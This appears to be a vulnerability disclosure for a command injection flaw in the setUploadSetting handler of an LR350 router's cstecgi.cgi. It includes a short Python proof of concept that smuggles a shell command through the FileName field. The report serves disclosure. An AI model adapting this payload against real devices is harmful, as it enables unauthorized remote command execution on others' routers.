LR350 - command injection - setUploadSetting

Hi, we found a command injection vulnerability at **LR350 (**Firmware version V9.3.5u.6369_B20220309), and contact you at the first time.

In function setUploadSetting of the file /cgi-bin/cstecgi.cgi, string FileName not checked and passed to system, result in command injection.

Untitled

PoC

import requests

url = "<http://192.168.17.220:80/cgi-bin/cstecgi.cgi>"
cookie = {"Cookie":"uid=1234"}
data = {'topicurl' : "setUploadSetting",
"FileName" : ";ls -lh ../ ;"}
response = requests.post(url, cookies=cookie, json=data)
print(response.text)
print(response)

Impact

Remote code execution

After execute the poc, the ls -lh ../ command is executed

Untitled

import requests

url = "http://192.168.17.220:80/cgi-bin/cstecgi.cgi" cookie = {"Cookie":"uid=1234"} data = {'topicurl' : "setUploadSetting", "FileName" : ";ls -lh ../ ;"} response = requests.post(url, cookies=cookie, json=data) print(response.text) print(response)